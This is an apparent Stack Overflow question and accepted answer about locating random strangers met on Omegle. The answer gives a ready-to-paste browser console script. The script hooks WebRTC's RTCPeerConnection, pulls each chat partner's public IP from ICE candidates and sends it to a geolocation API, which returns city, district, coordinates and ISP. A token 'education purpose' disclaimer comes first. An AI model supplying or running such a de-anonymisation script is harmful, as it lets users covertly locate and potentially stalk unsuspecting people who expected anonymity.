# How to get address/location of a random person on omegle?

Tags: javascript, geolocation, location, ip-address

[Omegle](https://www.omegle.com/) is a platform to connect with random persons. I want to get the location of each random person I connect with on Omegle.

Answer (score 4, accepted):

**THIS IS JUST FOR EDUCATION PURPOSE**

1. You need an API that can give the address based on the IP address. Go to https://ipgeolocation.io/, free signup, get the key, and replace in below code at YOURKEY in URL.
2. Goto https://www.omegle.com/, open developer options, paste the code into the console. You will the address of each person connected.

```
window.oRTCPeerConnection = window.oRTCPeerConnection || window.RTCPeerConnection;
window.RTCPeerConnection = function(...args){
    const pc = new window.oRTCPeerConnection(...args);
    pc.oaddIceCandidate = pc.addIceCandidate;
    pc.addIceCandidate = function(iceCandidate, ...rest){
        const fields = iceCandidate.candidate.split(" ");
        console.log(iceCandidate.candidate);
        const ip = fields[4];
        if (fields[7]==="srflx"){
            getlocation(ip);
        }
        return pc.oaddIceCandidate(iceCandidate, ...rest);
    };
    return pc;
}


const getlocation = async(ip) =>{
    let url = `https://api.ipgeolocation.io/ipgeo?apiKey=YOURKEY&ip=${ip}`;
    await fetch(url).then((response)=>
    response.json().then((json) => {

        

        const output = `
        .............................
        Country: ${json.country_name}
        State: ${json.state_prov}
        City: ${json.city}
        District: ${json.district}
        LAT/LONG: (${json.latitude} , ${json.longitude})
        provider: ${json.isp}
        ..................................`;
    
    console.log(output);

})
);
};
```